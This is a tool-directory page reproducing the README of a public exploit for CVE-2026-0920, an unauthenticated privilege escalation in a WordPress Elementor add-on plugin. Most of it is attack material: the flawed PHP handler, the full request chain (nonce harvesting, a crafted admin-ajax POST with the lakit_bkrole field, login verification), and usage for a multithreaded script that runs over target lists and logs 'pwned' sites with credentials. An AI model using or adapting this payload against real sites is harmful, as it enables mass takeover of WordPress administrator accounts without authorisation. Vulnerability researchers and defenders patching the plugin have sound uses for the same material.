Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-0920-
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & Education
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter

View Repository
2175 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 The exploit drops here first. Follow @KNxploited on Telegram — your elite feed for freshly disclosed CVEs, working PoCs, and precision security research. Updated relentlessly. Built for those who stay ahead.


🧠 Overview

CVE-2026-0920 is a CVSS 9.8 Critical vulnerability discovered in the LA-Studio Element Kit for Elementor WordPress plugin.

The flaw resides in the ajax_register_handle() function, which processes unauthenticated user registrations via AJAX. The function fails to enforce any restriction on the lakit_bkrole parameter — allowing a completely unauthenticated attacker to self-assign the administrator role during registration, achieving full WordPress admin takeover in a single request.

FieldDetails
CVE IDCVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Affected VersionsAll versions up to and including 1.5.6.3
Vulnerability TypeUnauthenticated Privilege Escalation / Admin Creation
Attack VectorNetwork — No Authentication Required
CVSS 3.1 Score9.8 CRITICAL
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactFull WordPress Administrator Takeover
ResearcherNxploited

💀 Vulnerability Deep Dive

The root cause is a missing role capability check inside the plugin's AJAX registration handler:

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Why this is critical:

  • wp_ajax_nopriv_* = accessible by anyone with zero authentication
  • lakit_bkrole accepts any WordPress role string — including administrator
  • A single POST request creates a fully privileged admin account
  • The nonce required is publicly exposed in the site's front-end HTML/JS
  • No rate limiting, no CAPTCHA enforcement by default, no email verification required

⚔️ Exploit Chain

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requirements

pip install requests colorama
DependencyPurpose
requestsHTTP requests, session handling, cookie management
coloramaColored terminal output on all platforms
threadingConcurrent multi-target processing
reRegex-based nonce extraction from HTML/JS

Python 3.10+ recommended (uses str | None union type hints).


📂 File Structure

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Usage

Step 1 — Configure Credentials (Optional)

Open CVE-2026-0920.py and edit the constants at the top to set your desired admin account details:

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Step 2 — Prepare Targets

Create list.txt with one target URL per line:

https://target1.com
https://target2.com
http://target3.com

URLs without a scheme are automatically prefixed with https://.


Step 3 — Run the Exploit

python CVE-2026-0920.py

You will be prompted:

Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Step 4 — Monitor Live Output

The script produces real-time, color-coded terminal output:

[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK
Download Tool